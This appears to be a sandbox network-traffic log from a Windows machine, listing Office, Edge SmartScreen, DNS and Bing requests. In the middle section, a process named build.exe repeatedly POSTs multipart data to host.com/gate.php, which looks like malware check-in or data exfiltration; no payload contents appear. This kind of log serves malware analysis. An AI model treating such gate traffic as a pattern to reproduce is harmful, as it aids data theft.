Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 550906
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
ETag: 0x8D60DDC2BE7DF3C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0414ccae-601e-0011-165a-b9109e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 640684
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:13 GMT
ETag: 0x8D60DDB5D624CF0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f61b9715-601e-001d-7a97-a0e183000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 222992
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
ETag: 0x8D60DDC26100537
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6efd7f9e-101e-00b2-2f97-a0755b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiKzl0YzlTRThEQnM9Iiwia2V5IjoibThuelhGbkNoZzEwWVdQZTNrRzVtdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1306
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:03:47 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiZk9ldy9jUjdURVE9Iiwia2V5IjoiY3ZJQnRldjZjSmg4ZVlNQlQ1VVViUT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1708
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:03:47 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 853
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

http://www.ethicalhackingtutorials.com/

msedge.exe

Remote address:

199.59.243.227:80

Request

GET / HTTP/1.1
Host: www.ethicalhackingtutorials.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:04:52 GMT
content-type: text/html; charset=utf-8
content-length: 1090
x-request-id: 93bce2d1-88cc-48dd-a51f-4f43505fbf6b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NMyWG5mPKU1gRzuB3GhGxWLW1F1nmCIfX7GoWgP/92HmYg+n0Mh44T/FUv2wjF4dwryerZZMl0nuKBIDz0Z2Bg==
set-cookie: parking_session=93bce2d1-88cc-48dd-a51f-4f43505fbf6b; expires=Wed, 04 Dec 2024 10:19:52 GMT; path=/
GET

http://www.ethicalhackingtutorials.com/bRXcLdFfr.js

msedge.exe

Remote address:

199.59.243.227:80

Request

GET /bRXcLdFfr.js HTTP/1.1
Host: www.ethicalhackingtutorials.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Referer: http://www.ethicalhackingtutorials.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=93bce2d1-88cc-48dd-a51f-4f43505fbf6b

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:04:52 GMT
content-type: application/javascript; charset=utf-8
content-length: 35064
x-request-id: ff25e9de-1923-4fc9-842b-4a12a3a1a26b
set-cookie: parking_session=93bce2d1-88cc-48dd-a51f-4f43505fbf6b; expires=Wed, 04 Dec 2024 10:19:52 GMT
POST

http://www.ethicalhackingtutorials.com/_fd

msedge.exe

Remote address:

199.59.243.227:80

Request

POST /_fd HTTP/1.1
Host: www.ethicalhackingtutorials.com
Connection: keep-alive
Content-Length: 0
Accept: application/json
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Content-Type: application/json
Origin: http://www.ethicalhackingtutorials.com
Referer: http://www.ethicalhackingtutorials.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=93bce2d1-88cc-48dd-a51f-4f43505fbf6b

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:04:51 GMT
content-type: application/json; charset=utf-8
content-length: 6485
x-request-id: 91ee1798-7115-4fb4-9eeb-9798fc8673c0
set-cookie: parking_session=93bce2d1-88cc-48dd-a51f-4f43505fbf6b; expires=Wed, 04 Dec 2024 10:19:52 GMT
DNS

msedge.exe

Remote address:

199.59.243.227:80

Response

HTTP/1.1 408 Request Time-out

Content-length: 110
Cache-Control: no-cache
Connection: close
Content-Type: text/html
DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
DNS

www.gstatic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.gstatic.com

IN A

Response

www.gstatic.com

IN A

142.250.178.3
DNS

fonts.gstatic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fonts.gstatic.com

IN A

Response

fonts.gstatic.com

IN A

172.217.16.227
DNS

host.com

msedge.exe

Remote address:

8.8.8.8:53

Request

host.com

IN A

Response

host.com

IN A

104.21.31.241

host.com

IN A

172.67.180.245
DNS

host.com

msedge.exe

Remote address:

8.8.8.8:53

Request

host.com

IN A

Response

host.com

IN A

104.21.31.241

host.com

IN A

172.67.180.245
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoid3RPMVNHZFo1dVU9Iiwia2V5IjoiYkVjZ09DSEY5OHVLbTJLaUxXRWRJdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1706
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:04:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 847
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiKzl0YzlTRThEQnM9Iiwia2V5IjoibThuelhGbkNoZzEwWVdQZTNrRzVtdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1306
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:04:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiZFRlZEU0SW8reGc9Iiwia2V5IjoiQkRYbzl3US9jL3RMWDV1ZndMeTlUdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2534
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:04:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 2632
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

http://host.com/gate.php

build.exe

Remote address:

104.21.31.241:80

Request

POST /gate.php HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Referer: host.com/gate.php
Connection: close
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0

Response

HTTP/1.1 404 Not Found

Date: Wed, 04 Dec 2024 10:05:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYa418RPtquOZ77IuyEJnk%2BRXcBoxxKMkU650ZH3iN1EzxDBOTGYTyAnEj6G6%2BNZL2W1880dNefQcq39NFOcDKWO2MfYxw8Ypt4VigB5UvO9DVgHkoTsMtyI%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ecafa244c69ef40-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26383&min_rtt=26383&rtt_var=13191&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=577&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://host.com/gate.php

build.exe

Remote address:

104.21.31.241:80

Request

POST /gate.php HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Referer: host.com/gate.php
Connection: close
Content-Length: 2847
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0

Response

HTTP/1.1 404 Not Found

Date: Wed, 04 Dec 2024 10:05:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2w64uKuShORXltjeidH6vMULgosala0Yn%2FXDDJFnInTkz%2FNPBWZrLTueO7UYJvAO%2Bd2yPivlVEXSjboYm067zc8TLmJDXQ0h6YhZY40GoZmGm%2FIKvtHR3L2v4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ecafa261fca640c-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26894&min_rtt=26894&rtt_var=13447&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3161&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

241.31.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.31.21.104.in-addr.arpa

IN PTR

Response
DNS

241.31.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.31.21.104.in-addr.arpa

IN PTR

Response
POST

http://host.com/gate.php

build.exe

Remote address:

104.21.31.241:80

Request

POST /gate.php HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Referer: host.com/gate.php
Connection: close
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0

Response

HTTP/1.1 404 Not Found

Date: Wed, 04 Dec 2024 10:05:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MzVArtLB3QOSlBq9lEmQYsP0D4i%2Fj7V1o2dVJr4ZKBrM7blaCTayJfUNHYvYE0eH7fx3HIJd1eR7ThVcP4LyFh0Nhv0akuYYoP494Ye4p6KsQ8sA2V5dtW0l0g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ecafa42fca0640f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26531&min_rtt=26531&rtt_var=13265&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=577&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://host.com/gate.php

build.exe

Remote address:

104.21.31.241:80

Request

POST /gate.php HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Referer: host.com/gate.php
Connection: close
Content-Length: 2840
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0

Response

HTTP/1.1 404 Not Found

Date: Wed, 04 Dec 2024 10:05:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3%2BNyNc3L4yICXUjFjnmRBe0M8%2Fs9V8p7Jsk2lyerlTkSfyp%2FmS0JSBCbb6%2FGhBy9M8ZFXrDyL5ByDgzTdnbS0dchMcH1TMwPDyYKxTFnZPageT%2FeG5Xzunv%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ecafa44cc146549-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27080&min_rtt=27080&rtt_var=13540&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3154&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiVGNNZ29BQXlGUEE9Iiwia2V5IjoiRDFHMlBYVDRMUHRwbHBlREg2dXlVdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1772
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:08:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1009
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiKzl0YzlTRThEQnM9Iiwia2V5IjoibThuelhGbkNoZzEwWVdQZTNrRzVtdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1306
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:08:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiN2tFUCtSNDlXM009Iiwia2V5IjoiZEQ3RnVMRlZIbEV4bkNBRFJJekJ3Zz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1682
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:08:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 792
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoieURpWXo2S2xKWEU9Iiwia2V5IjoiZWF6ZHJZT3FYRGxJQ3VieEpyQUlZdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2048
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1033
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiSUh0UytjeWxzQzQ9Iiwia2V5IjoicmJ4VklpcUdRRlBrSzFhQTNBSmZUdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1701
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 825
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiRm0wSjVBcmJsRDA9Iiwia2V5IjoiUXJ3dTJvclpKcll4d3grR3h5bDJudz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1761
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 905
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiT21TTXJJWEhPM3c9Iiwia2V5IjoiVlZVbXBCdm9UQ05YUFhGOUdYbll1dz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1882
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 972
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

msedge.exe

Remote address:

172.165.61.93:443

Request

POST /api/browser/edge/downloadcomplete/1 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiaEZuNWZlZDNlMjg9Iiwia2V5IjoiOEtZK2ZSeXRIQ01aVS9MRmpwTnZNdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 13139
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 916
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:7f05e9f0-1fe6-401c-8ae7-2478e40e2f1e
GET

https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=1a8b0213cc574135b5fb05c83f2ee1a6&oit=1&cp=1&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=o&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=1a8b0213cc574135b5fb05c83f2ee1a6&oit=1&cp=1&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 427
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0770114fc08d4baa483aaee491
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Et/1tAxZIY/n/EKP+aiQunbmI5hB8o75ShRw8g/OhMc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:07 GMT
set-cookie: MUID=308B20C47BD16C702CF2358F7AAC6D4B; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=308B20C47BD16C702CF2358F7AAC6D4B; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=112A193BC3E86BB22CB40C70C2956AA3; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=2E9163ACD92F4E82A3850AC39A3461FC&dmnchg=1; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241204; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:07 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=112A193BC3E86BB22CB40C70C2956AA3; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306887.7f0d8fe
GET

https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=5f96492435374cfa983fd7f3162ee7fb&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=5f96492435374cfa983fd7f3162ee7fb&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
